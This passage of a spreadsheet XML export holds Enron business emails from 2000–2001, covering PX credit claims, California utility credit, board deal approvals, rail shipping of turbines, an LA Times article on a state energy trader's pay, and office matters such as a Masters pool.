Enron Energy Services       $ 19,737,979.97_x000D_
Total disclosed PX credit   $221,702,885.61_x000D_
_x000D_
Note that in the claims that were listed as unknown in amount, none were _x000D_
described as PX Credit in nature. _x000D_
_x000D_
Two points to be made: 1) this information is now public (but on page 5,066 _x000D_
of 17,096 on a CD), along with $53,985,167 in other Enron related claims, and _x000D_
2) our calculation of the PX credit was $392,416,534 at the beginning of May._x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
Michael_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 21 Dec 2000 00:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: California credit issues</t>
  </si>
  <si>
    <t xml:space="preserve">Check out WSJ- Page A2. Also,Bill Bradford in Rick buy's group is person _x000D_
most  proficient on credit issues relative to the three calif. utilities. I _x000D_
will also get back to you this afternoon........The CPUC is scheduled to _x000D_
issue orders today at 12:00 CST that may dramatically affect credit ratings _x000D_
of the 3 utilities. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark Schroeder@ECT_x000D_
12/21/2000 08:13 AM_x000D_
To: Richard Shapiro/NA/Enron@Enron, Jeff Dasovich/NA/Enron@Enron_x000D_
cc: John Sherriff/LON/ECT@ECT, Bryan Seyfried/LON/ECT@ECT _x000D_
_x000D_
Subject: California credit issues_x000D_
_x000D_
Rick/Jeff - I just spoke with John Sherriff and mentioned to him how on top _x000D_
of California you guys were.  As you may be aware, we are making markets in _x000D_
the credit of many utilities and telcomm companies, via EnronCredit.com.  _x000D_
Brian Seyfried is the commercial leader for this business.  John has asked me _x000D_
to ask you, if you become aware of significant developments, in the public _x000D_
sector (not privileged/insider information), bearing on _x000D_
creditworthiness/ability to pay by California utilities, would you please _x000D_
keep us informed, as we will have a keen interest in these developments?  _x000D_
Please forward to this to any others on your team(s) you think appropriate.   _x000D_
thanks   mcs_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 11:07:22 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Datasheet</t>
  </si>
  <si>
    <t xml:space="preserve">no problem!_x000D_
_x000D_
: )_x000D_
Taria_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Jones, Tana  _x000D_
Sent:	Monday, October 29, 2001 1:07 PM_x000D_
To:	Reed, Taria_x000D_
Subject:	RE: Datasheet_x000D_
_x000D_
Taria,_x000D_
_x000D_
Thanks for your help, I really appreciate it!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Reed, Taria  _x000D_
Sent:	Monday, October 29, 2001 1:06 PM_x000D_
To:	Jones, Tana_x000D_
Subject:	RE: Datasheet_x000D_
_x000D_
here are the last two on the list_x000D_
_x000D_
 &lt;&lt; File: datasheets.doc &gt;&gt; _x000D_
Taria_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Jones, Tana  _x000D_
Sent:	Monday, October 29, 2001 11:26 AM_x000D_
To:	Reed, Taria_x000D_
Subject:	RE: Datasheet_x000D_
_x000D_
I just got handed another list..._x000D_
_x000D_
Can I get the datasheets for the following companies:_x000D_
_x000D_
Enron Global Markets LLC_x000D_
Enron Liquids Fuels, Inc._x000D_
Enron Fuels Caribbean L.P._x000D_
Enron Petrochemicals Company_x000D_
Enron Gas Liquids, Inc._x000D_
Enron Clean Fuels Company_x000D_
Enron Reserve Acquisition Corp._x000D_
Enron Capital &amp; Trade Resources Singapore Pte Ltd_x000D_
Enron Capital &amp; Trade Global Resources Corp._x000D_
Enron Capital &amp; Trade International Corp._x000D_
Enron Capital &amp; Trade International Corp. - Singapore Branch_x000D_
_x000D_
Thanks!_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Reed, Taria  _x000D_
Sent:	Monday, October 29, 2001 11:16 AM_x000D_
To:	Jones, Tana_x000D_
Subject:	Datasheet_x000D_
_x000D_
Attached are datasheets for: _x000D_
Enron North America Corp._x000D_
Enron Canada Corp._x000D_
Enron Power Marketing Inc._x000D_
ECT Investments, Inc._x000D_
Enron Credit Inc._x000D_
(all on one document)_x000D_
_x000D_
Taria Reed_x000D_
Corporate Secretary Department_x000D_
ext. 57628_x000D_
_x000D_
_x000D_
 &lt;&lt; File: datasheets.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 03:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Board Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">fyi, rick_x000D_
---------------------- Forwarded by Rick Buy/HOU/ECT on 11/21/2000 11:02 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
David W Delainey_x000D_
11/21/2000 09:53 AM_x000D_
To: Rick Buy/HOU/ECT@ECT_x000D_
cc: Rebecca Carter/Corp/Enron@ENRON _x000D_
Subject: Board Meeting_x000D_
_x000D_
Rick, I need your view on which of these deals need to go through the board:_x000D_
_x000D_
 - Tex Mex (ERCOT to Mexico transmission line with term PPA with Desarco)_x000D_
 - Ahlstrom (QF Purchase)_x000D_
 - CRRA/Fuel Cell Energy (fuel cell deal with Conn. regulators)_x000D_
 - sale of Pastoria and LV Cogen (assume not)_x000D_
 - sale of ECP (assume not)_x000D_
 - sale of HPL (assume not)._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 02:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alan.larsen@enron.com'})</t>
  </si>
  <si>
    <t>Re: Rail</t>
  </si>
  <si>
    <t xml:space="preserve">Don't forget Mama and gettin' otta jail._x000D_
_x000D_
ckm_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Alan Larsen@ECT_x000D_
11/29/2000 10:32 AM_x000D_
To: Barton Clark/HOU/ECT@ECT, Kay Mann/Corp/Enron@Enron_x000D_
cc: Jeff G Slaughter/PDX/ECT@ECT _x000D_
_x000D_
Subject: Re: Rail  _x000D_
_x000D_
Thanks for your help.  I'm thinking maybe I can write a country and western _x000D_
song about all this.  Something like:  "Slow train out of Texas, tons of _x000D_
steel a rollin'. Headed up to Colorado,  CTs for natural gas a tollin'."   _x000D_
Then of course, I'll need to get into beers and tears, and all the other _x000D_
necessary components of a good C&amp;W ditty.  Thanks again._x000D_
 Al_x000D_
_x000D_
_x000D_
_x000D_
Barton Clark_x000D_
11/29/2000 09:30 AM_x000D_
To: Alan Larsen/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Rail_x000D_
_x000D_
Kay may be right about cargo like turbines, but I know in the coal business _x000D_
we heavily negotiated bulk commodity transportation agreements that governed _x000D_
our shipments, and it was not necessarily the railroad's way. However, for a _x000D_
one shot shipment, I think Kay is probably right, although we should have _x000D_
some leverage to get reasonable provisions re risk of loss, etc._x000D_
----- Forwarded by Barton Clark/HOU/ECT on 11/29/2000 09:28 AM -----_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	11/29/2000 09:26 AM_x000D_
		 _x000D_
		 To: Barton Clark/HOU/ECT@ECT, Alan Larsen/PDX/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Rail_x000D_
_x000D_
Since you both asked the same question, I thought I would send an email._x000D_
_x000D_
The little I know about rail is that the railroads control the contracts.  _x000D_
You do it their way._x000D_
_x000D_
There is a lot of language in the LM contract concerning shipment, risk of _x000D_
loss, insurance, delivery.  I haven't thought through it all, but these _x000D_
issues probably need to be considered.   It may be best to work through GE on _x000D_
a change order basis to have them handle the shipment and storage elsewhere.  _x000D_
Otherwise, we run the risk of having a dispute with them later about any _x000D_
problems or damage.  _x000D_
_x000D_
I will be talking to GE this afternoon if you want the topic to be discussed _x000D_
then._x000D_
_x000D_
Good luck!_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 05:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Jeff Dasovich/NA/Enron on 12/14/2000 01:12 PM -----_x000D_
_x000D_
	Miyung Buster@ENRON_DEVELOPMENT_x000D_
	12/14/2000 10:51 AM_x000D_
		 _x000D_
		 To: Elizabeth Linnell/NA/Enron@Enron, filuntz@aol.com, James D _x000D_
Steffes/NA/Enron@Enron, Jeannie Mandelker/HOU/ECT@ECT, Jeff _x000D_
Dasovich/NA/Enron@Enron, Joe Hartsoe/Corp/Enron@ENRON, Karen _x000D_
Denne/Corp/Enron@ENRON, Mark Palmer/Corp/Enron@ENRON, Mark _x000D_
Schroeder/LON/ECT@ECT, Mike Dahlke/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Nicholas O'Day/AP/Enron@Enron, Paul Kaufman/PDX/ECT@ECT, Peggy _x000D_
Mahoney/HOU/EES@EES, Peter Styles/LON/ECT@ECT, Richard _x000D_
Shapiro/NA/Enron@Enron, Rob Bradley/Corp/Enron@ENRON, Sandra _x000D_
McCubbin/NA/Enron@Enron, Shelley Corman/ET&amp;S/Enron@ENRON, Steven J _x000D_
Kean/NA/Enron@Enron, Margaret Carson/Corp/Enron@ENRON, Mona L _x000D_
Petrochko/NA/Enron@Enron, Mary Hain/HOU/ECT@ECT, Susan J Mara/NA/Enron@Enron, _x000D_
Gia Maisashvili/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John _x000D_
Neslage/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
		 cc: _x000D_
		 Subject: Energy Issues_x000D_
_x000D_
Please see the attached articles:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Jul 2001 05:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ray.alvarez@enron.com', 'kate.symes@enron.com', 'paul.choi@enron.com', 'tim.heizenrader@enron.com', 'tim.belden@enron.com', 'mark.fischer@enron.com', 'chris.mallory@enron.com', 'stewart.rosman@enron.com', 'robert.badeer@enron.com', 'dave.perrino@enron.com', 'stephen.swain@enron.com', 'chris.stokley@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'jeff.richter@enron.com', 'holli.krebs@enron.com', 'michael.driscoll@enron.com', 'tom.alonso@enron.com', 'mike.swerzbin@enron.com', 'bill.iii@enron.com', 'steve.hall@enron.com', 'phillip.platter@enron.com', 'john.malowney@enron.com', 'diana.scholtes@enron.com', 'chris.foster@enron.com', 'matt.motley@enron.com', 'mark.guzman@enron.com', 'elliot.mainzer@enron.com', 'christopher.calger@enron.com', 'jeff.dasovich@enron.com', 'greg.wolfe@enron.com'})</t>
  </si>
  <si>
    <t>Energy Novice to Be Paid $240,000</t>
  </si>
  <si>
    <t xml:space="preserve">Good work if you can find it ...._x000D_
 _x000D_
Wednesday, July 4, 2001 _x000D_
Energy Novice to Be Paid $240,000 _x000D_
 Power: Hefty annual salary goes to consultant with one year's experience in _x000D_
the field. State officials say she is doing a good job. _x000D_
_x000D_
_x000D_
By JEFFREY L. RABIN, DARYL KELLEY, Times Staff Writers_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
     The Davis administration is paying a young business consultant with _x000D_
barely a year's experience in the energy industry $240,000 annually to head a _x000D_
team of traders who secure California's daily electricity supply. _x000D_
     State officials hired Susan T. Lee, 30, in April without competitive _x000D_
bidding under an emergency declaration by Gov. Gray Davis. _x000D_
     Lee's contract is equal to the $20,000 a month that Davis pays his chief _x000D_
energy advisor, S. David Freeman, a top utility executive for decades. _x000D_
     The two-year contract will pay Lee up to $480,000 to oversee the state's _x000D_
day-to-day energy purchases, totaling billions of dollars a year. _x000D_
     Lee's contract reflects the pressure and difficulties the state says it _x000D_
faces to fill key jobs in its new role as one of the nation's largest power _x000D_
buyers, a role that it took on in January as California's utilities faltered. _x000D_
     Lee's contract was one of about a dozen released Monday, and among the _x000D_
largest. _x000D_
     Reached at her Sacramento office, Lee would not discuss her contract. _x000D_
She said only that she heads a 15-person team of traders and schedulers that _x000D_
works long hours to keep California's power flowing. _x000D_
     Pete Garris, a contracts manager for the state Department of Water _x000D_
Resources who recruited Lee, said he met her at industry meetings and had _x000D_
been impressed by her savvy. _x000D_
     He said he gave her a pay raise to lure her to state service in April _x000D_
after Ron Shimizu, her boss at Mieco Inc., a trading firm in Long Beach, _x000D_
recommended her. Shimizu refused comment Tuesday. _x000D_
     The state, according to Garris, must compete for employees against an _x000D_
aggressive energy industry and pay good salaries to stay in the game. _x000D_
     "You can consider this situation to be very extraordinary," Garris said. _x000D_
"Unless we can get permanent and full-time positions approved, these are the _x000D_
rules we have to follow to be able to hire [consultants]." _x000D_
     Garris insisted that it is unfair to compare Lee's contract with the _x000D_
six-month, $120,000 deal that Freeman--the former boss at several major _x000D_
utilities--struck with the governor. _x000D_
     "I don't want to compare Susan Lee to David Freeman," Garris said. _x000D_
"David comes from the Los Angeles Department of Water and Power and Susan _x000D_
came from a [private] power marketer. With Susan, we just followed the _x000D_
standard formula." _x000D_
     In her new job, Lee will direct an immensely complicated, _x000D_
around-the-clock operation responsible for "procuring energy, scheduling _x000D_
power and associated transmission, and reconciling deviations between _x000D_
contracts and deliveries," according to her contract. _x000D_
     Lee's resume, attached to the contract, shows that she had no experience _x000D_
in the energy field until March 2000, when she joined Mieco. There, she was a _x000D_
trader and power scheduler, not a manager. _x000D_
     "She was only here for a year or so," said Dina Alvarez, an _x000D_
administrative manager for the company. _x000D_
     A 1994 graduate of UCLA with a degree in economics, she worked as a _x000D_
pension and benefits manager in Los Angeles and New York before joining _x000D_
Mieco. _x000D_
     Lee's contract stands out compared to others disclosed this week, not _x000D_
only for its size but for her relative inexperience in the energy field. _x000D_
     She is being paid $120 an hour and can earn a maximum of $480,000, _x000D_
including expenses, by April 2003. _x000D_
     Another new consultant, William L. Green, has almost a quarter of a _x000D_
century of experience working for the Bonneville Power Administration, _x000D_
Pacific Gas &amp; Electric and the California Independent System Operator. He is _x000D_
being paid $85 an hour to supervise workers who reconcile the state's _x000D_
accounting of energy purchases. His two-year deal is worth up to $340,000. _x000D_
     They are not alone in cutting lucrative deals. _x000D_
     Richard Ferreira, the former assistant general manager at the Sacramento _x000D_
Municipal Utilities District, has a $500,000 contract and is being paid $200 _x000D_
an hour to assist the state in negotiating power purchase contracts. He _x000D_
worked for the Department of Water Resources for 23 years before joining the _x000D_
Sacramento agency in 1987. _x000D_
     Hardy Energy Consulting also has a $150,000, six-month contract that _x000D_
calls for Randy Harvey to be paid $300 an hour. Harvey has a quarter of a _x000D_
century of energy experience, particularly at the Bonneville Power _x000D_
Administration, where he was chief executive officer from 1991 to 1997. _x000D_
     Lee's recruiter, Garris, said her lack of experience is not a concern. _x000D_
     "So far she's done an excellent job," he said. "She has the skills, and _x000D_
she has the ability. She was doing a similar job." _x000D_
     Dozens of consultants, including Lee, have been hired since January, _x000D_
when Davis declared an energy emergency and set up a special arm of _x000D_
government to buy power. _x000D_
     The state filled a vacuum when generators refused to sell to PG&amp;E, _x000D_
Southern California Edison and San Diego Gas &amp; Electric because they were no _x000D_
longer considered credit-worthy, said Oscar Hidalgo, spokesman for the _x000D_
Department of Water Resources. _x000D_
     Hidalgo said that about 60% of the 95 people now working for the _x000D_
division are consultants. The rest are state employees. _x000D_
     As part of the process, Lee's unit oversees the purchase of power a day _x000D_
ahead of when it is needed. Hidalgo said Lee is involved in contracts that _x000D_
extend no more than three months. _x000D_
Copyright 2001 Los Angeles Times _x000D_
 _x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
  _x000D_
 _x000D_
 </t>
  </si>
  <si>
    <t>Fri, 21 Jul 2000 04:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tmonaldo@mrg-11c.com'})</t>
  </si>
  <si>
    <t>Four Corners Pricing</t>
  </si>
  <si>
    <t xml:space="preserve">Tino, attached is a spreadsheet with the info I think you need.  I got the _x000D_
publication wrong--its "Megawatt Daily" that posts daily prices.  Hope this _x000D_
is helpful.  DF _x000D_
_x000D_
Drew,_x000D_
_x000D_
Attached is an excel file which contains pricing for the following delivery _x000D_
points January 1, 1999 through _x000D_
April 30, 2000:_x000D_
_x000D_
 Four Corners_x000D_
 Palo Verde_x000D_
 Mead Nevada_x000D_
 Southwest Power Pool_x000D_
_x000D_
Let me know if you want any additional information.  We can get April 30, _x000D_
2000 to present information.  I just_x000D_
have to call RDI--they put it out by quarter so at the end of July we will _x000D_
get the next disk.  They'll send me the_x000D_
data if we need it._x000D_
_x000D_
Lorna_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 13:50:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'harry.kingerski@enron.com', 'patrick.keene@enron.com', 'paul.kaufman@enron.com', 'm..landwehr@enron.com', 'leslie.lawner@enron.com', 'mark.whitt@enron.com'})</t>
  </si>
  <si>
    <t>Colorado Comment on Commission's GCA Rules</t>
  </si>
  <si>
    <t xml:space="preserve">The attached comments were filed today with the Colorado PUC._x000D_
_x000D_
A hearing is scheduled for November 1, 2001 in which Enron's and other parties' comments will be presented to the Commissioners by the Commission's Staff._x000D_
_x000D_
Robert_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 10:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Any recommendations. Please, let me know ASAP._x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/24/2001 _x000D_
05:09 PM ---------------------------_x000D_
_x000D_
_x000D_
Albert Wang &lt;wangfa@rice.edu&gt; on 04/23/2001 12:37:55 PM_x000D_
To: Vince.J.Kaminski@enron.com_x000D_
cc:  _x000D_
Subject: Rice/Enron Speakers for Fall 2001 and Spring 2002_x000D_
_x000D_
_x000D_
Hi, Vince:_x000D_
_x000D_
We are considering a preliminary list of speakers for Rice/Enron Seminar _x000D_
Series in Finance for Fall 2001 and Spring 2002.? Do you have any persons in _x000D_
mind that you and your group want to include in the list?? Finance faculty _x000D_
will meet to finalize the list later._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Albert_x000D_
_x000D_
P.S.: Is Ronnie Chahal still around?? She is currently in my Enron _x000D_
distribution list with email address: rchahal@ess.enron.com.? I have received _x000D_
an error message indicating a failure of delivering email to her address._x000D_
_x000D_
Fu-Kuo Albert Wang_x000D_
Assistant Professor_x000D_
Jones Graduate School of Management -- MS 531? _x000D_
Rice University? _x000D_
6100 Main Street? _x000D_
Houston, TX 77005? _x000D_
_x000D_
Phone: 713-348-5404? _x000D_
Fax:???? 713-348-5251_x000D_
email: wangfa@rice.edu_x000D_
http://www.ruf.rice.edu/~wangfa/_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>FORCE MAJEURE SITUATION - JENNINGS PLANT</t>
  </si>
  <si>
    <t xml:space="preserve">The volume was down to 1238 because of prev adjustments._x000D_
_x000D_
Carlos_x000D_
---------------------- Forwarded by Carlos J Rodriguez/HOU/ECT on 12/13/2000 _x000D_
02:09 PM ---------------------------_x000D_
_x000D_
_x000D_
Beverly Beaty_x000D_
12/13/2000 10:06 AM_x000D_
To: Carlos J Rodriguez/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: FORCE MAJEURE SITUATION - JENNINGS PLANT_x000D_
_x000D_
fyi from Devon_x000D_
_x000D_
Bev_x000D_
---------------------- Forwarded by Beverly Beaty/HOU/ECT on 12/13/2000 09:04 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Gary Daniel &lt;danielclan@yahoo.com&gt;                           _x000D_
12/13/2000 10:02 AM_x000D_
	_x000D_
_x000D_
To: beverly.beaty@enron.com_x000D_
cc: cynthia.cantrell@dvn.com _x000D_
Subject: FORCE MAJEURE SITUATION - JENNINGS PLANT_x000D_
_x000D_
_x000D_
Beverly:_x000D_
_x000D_
Could you please forward this to Carlos?  I am at home_x000D_
today and do not have his e-mail._x000D_
_x000D_
Thanks._x000D_
_x000D_
Carlos Rodriguez_x000D_
Enron_x000D_
Via E-Mail_x000D_
_x000D_
Dear Carlos:_x000D_
_x000D_
Due to an electrical shortage at the Jennings Plant,_x000D_
which shut the plant down, we are in a force majeure_x000D_
situation effective immediately.  The plant expects to_x000D_
be back up tomorrow, December 14.  We will advise you_x000D_
tomorrow of the situation._x000D_
_x000D_
We are reducing our nomination to 0 effective today,_x000D_
December 13.  The nomination was 1769._x000D_
_x000D_
Please call me if you have any questions._x000D_
_x000D_
Thanks._x000D_
_x000D_
Evelyn Daniel_x000D_
Devon Energy_x000D_
(405) 552-4585 (work)_x000D_
(405) 391-9398_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 14:38:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>Weblink</t>
  </si>
  <si>
    <t>Amanda,_x000D_
_x000D_
Please add a new link under the the Power tab in the Plant Outages folder called WSCC Interactive (Portland).  The file is in the California directory within the Power directory.  It is called pge_Portland_data.htm.  Thanks._x000D_
_x000D_
Mat</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 07:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'taschehoug@thermoecotek.com', 'roger.pelote@williams.com', 'kfickett@usgen.com', 'rescalante@riobravo-gm.com', 'jackp@calpine.com', 'siliff@riobravo-gm.com', 'susan_j_mara@enron.com', 'lale@dynegy.com', 'billw@calpine.com', 'steve_ponder@fpl.com', 'dnelsen@gwfpower.com', 'rjhickok@duke-energy.com', 'cody.carter@williams.com', 'wfhall2@duke-energy.com', 'eric.eisenman@neg.pge.com', 'gtbl@dynegy.com', 'dean_gosselin@fpl.com', 'khoffman@caithnessenergy.com', 'frank.derosa@gen.pge.com', 'snoll@thermoecotek.com', 'hap.boyd@enron.com', 'rllamkin@seiworldwide.com', 'twetzel@thermoecotek.com', 'marty_mcfadden@ogden-energy.com', 'wcarlson@wm.com', 'jdasovic@enron.com', 'ed.tomeo@uaecorp.com', 'joe.greco@uaecorp.com', 'cabaker@duke-energy.com', 'paula_soos@ogden-energy.com', 'eileenk@calpine.com', 'curt.hatton@gen.pge.com', 'dparque@ect.enron.com', 'elliottsa@earthlink.net', 'joer@calpine.com', 'jweisgall@aol.com', 'curtis_l_kebler@reliantenergy.com'})</t>
  </si>
  <si>
    <t>IEP Board Meeting on December 4, 20000: Agenda</t>
  </si>
  <si>
    <t>Attached for your information is a draft IEP Board  meeting agenda for _x000D_
December 4, 2000.? The meeting is scheduled to begin at  9:00 a.m. and _x000D_
continue through until 3:00 p.m.? It will be held here at  IEP._x000D_
 - Board Mt. Agenda  12-4-00.doc</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 07:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'david.baumbach@enron.com', "o'neal.winfree@enron.com"})</t>
  </si>
  <si>
    <t>2001 Masters Pool</t>
  </si>
  <si>
    <t xml:space="preserve">money and entry due by 7 a.m. tomorrow._x000D_
PL_x000D_
_x000D_
---------------------- Forwarded by Phillip M Love/HOU/ECT on 04/04/2001 _x000D_
02:02 PM ---------------------------_x000D_
From: Eric Groves/ENRON@enronXgate on 04/04/2001 08:11 AM_x000D_
To: Mark Fondren/ENRON@enronXgate, Rajib Saha/ENRON@enronXgate, John _x000D_
Swinney/ENRON@enronXgate, Scott Earnest/ENRON@enronXgate, William E _x000D_
Kasemervisz/ENRON@enronXgate, John L Nowlan/HOU/ECT@ECT, Tomas _x000D_
Tellez/HOU/ECT@ECT, Chad Pennix/HOU/ECT@ECT, Douglas S Friedman/HOU/ECT@ECT, _x000D_
Adam Gross/HOU/ECT@ECT, Lee Jackson/HOU/ECT@ECT, Brent A _x000D_
Price/ENRON@enronXgate, Patrick Stafford/ENRON@enronXgate, Tom _x000D_
Mcquade/HOU/ECT@ECT, Gary W Lamphier/HOU/ECT@ECT, John Massey/HOU/ECT@ECT, _x000D_
Phillip M Love/HOU/ECT@ECT, Jeffrey C Gossett/HOU/ECT@ECT, Martin _x000D_
Cuilla/HOU/ECT@ECT, Eric Moon/HOU/ECT@ECT, _x000D_
egroves1111@hotmail.com@SMTP@enronXgate, "John (E-mail)" _x000D_
&lt;jholland-kdi@cox-internet.com&gt;@SMTP@enronXgate, "Jen (E-mail)" _x000D_
&lt;jennifer.battey@corning.com&gt;@SMTP@enronXgate, "Geoff (E-mail)" _x000D_
&lt;Geoffrey.McIntyre@Daltile.com&gt;@SMTP@enronXgate, Mason Hamlin/HOU/ECT@ECT, _x000D_
Brian Spector/Enron Communications@Enron Communications, "Mom (E-mail)" _x000D_
&lt;cgroves@frostbank.com&gt;@SMTP@enronXgate, Simon Thurbin/LON/ECT@ECT, Richard _x000D_
Cross/ENRON@enronXgate, Matthew Arnold/HOU/ECT@ECT, Allen B _x000D_
Childress/HOU/ECT@ECT, George McClellan/HOU/ECT@ECT, David _x000D_
Loosley/NA/Enron@Enron, Mo Bawa/NA/Enron@ENRON, Brian O'Rourke/Enron _x000D_
Communications@Enron Communications_x000D_
cc:  _x000D_
Subject: 2001 Masters Pool_x000D_
_x000D_
The Azaleas are blooming and the greens are fast. The Masters are here.  More _x000D_
importantly the Masters pool is back. Sorry for the short notice, but what _x000D_
would a major be without the pool. Please invite others.$20 each. Fill out in _x000D_
Excel and return email the saved file (or hardcopy to me 2986b). _x000D_
_x000D_
PLEASE INCLUDE YOUR NAME ON THE ENTRY FORM._x000D_
RULES IN ATTACHED FILE. GOOD LUCK. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 05:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Global Markets Monitor 12Jan01</t>
  </si>
  <si>
    <t>---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 01/16/2001 _x000D_
01:14 PM ---------------------------_x000D_
Maureen Raymond @ ENRON   01/12/2001 07:46 PM_x000D_
_x000D_
Sent by: Gwyn Koepke@ENRON_x000D_
To: Gary Hickerson/HOU/ECT@ECT, Pushkar Shahi/HOU/ECT@ECT, William _x000D_
Stuart/HOU/ECT@ECT, Darren Delage/AP/Enron@Enron, Ellen Su/Corp/Enron@Enron, _x000D_
Martina Angelova/LON/ECT@ECT, Trena McFarland/NA/Enron@Enron, Jurgen _x000D_
Hess/LON/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT, jennifer.fraser@enron.com, _x000D_
anna.meher@enron.com, sgibner@enron.com, gmcclel@enron.com, _x000D_
stuart.staley@enron.com, harora@enron.com, eric.boyt@enron.com, _x000D_
shurwit@enron.com, shane.dallmann@enron.com, aaron.armstrong@enron.com, _x000D_
john.allario@enron.com, andrea.v.reed@enron.com, joverdy@enron.com, _x000D_
paul.mead@enron.com, john.sherriff@enron.com_x000D_
cc: William Smith/Corp/Enron@ENRON, Elena Chilkina/Corp/Enron@Enron _x000D_
Subject: Global Markets Monitor 12Jan01_x000D_
_x000D_
Please find attached the Global Markets Monitor for the week ending 12 _x000D_
January 2001._x000D_
_x000D_
_x000D_
_x000D_
Maureen Raymond-Castaneda &amp;_x000D_
Gwyn Koepke</t>
  </si>
  <si>
    <t>Fri, 16 Jun 2000 08:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marie.heard@enron.com', 'tana.jones@enron.com', 'shari.stack@enron.com', 'sara.shackleton@enron.com', 'susan.flynn@enron.com', 'jason.peters@enron.com', 'susan.bailey@enron.com', 'samantha.boyd@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Lunch For Rod Nelson</t>
  </si>
  <si>
    <t>Group:_x000D_
Mark has okay'ed having a going away lunch for Rod.  Looks like the week of _x000D_
June 26th works best for Rod.  Please e-mail Suzanne Adams by Monday of next _x000D_
week any days that week that do not work for you so we can pick a date.  _x000D_
Thanks._x000D_
Carol</t>
  </si>
  <si>
    <t xml:space="preserve">Please review numbers._x000D_
_x000D_
Any chance D. Duran can come with you guys?  We should be ready in about 15 _x000D_
minutes._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 05/01/2001 10:56 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Campbell, Carolyn" &lt;CCampbell@KSLAW.com&gt; on 05/01/2001 10:46:01 AM_x000D_
To: "'gregorylang@paulhastings.com'" &lt;gregorylang@paulhastings.com&gt;, _x000D_
"'kay.mann@enron.com'" &lt;kay.mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Revised Escrow Disbursement Instruction Letter_x000D_
_x000D_
_x000D_
 &lt;&lt;2Z$803!.DOC&gt;&gt;  &lt;&lt;2Z$8RED.DOC&gt;&gt;_x000D_
_x000D_
_x000D_
Greg and Kay:_x000D_
_x000D_
I have enclosed clean and blacklined copies of the escrow disbursement_x000D_
instruction letter, marked to reflect changes from the draft previously_x000D_
circulated for signature.  The only revisions were to change the persons_x000D_
named to sign this letter to be individuals who are available and who were_x000D_
named as authorized on the respective incumbency certificate previously_x000D_
submitted to Citibank, and to delete the bracketed information on the first_x000D_
page of the letter addressing the GE letter of credit, as this is expected_x000D_
to be available by fax on Wednesday.  Please ensure that the signature page_x000D_
of this letter is signed and ready  to transmit to Citibank by fax upon_x000D_
closing on Wednesday._x000D_
_x000D_
If no one has an objection, I will send a draft of this document to Estelle_x000D_
Lawrence at Citibank today in order that she can be preparing to receive the_x000D_
signed copy by fax tomorrow.   Thanks._x000D_
_x000D_
Carolyn M. Campbell_x000D_
King &amp; Spalding_x000D_
713-276-7307 (phone)_x000D_
713-751-3280 (fax)_x000D_
ccampbell@kslaw.com &lt;mailto:ccampbell@kslaw.com&gt;_x000D_
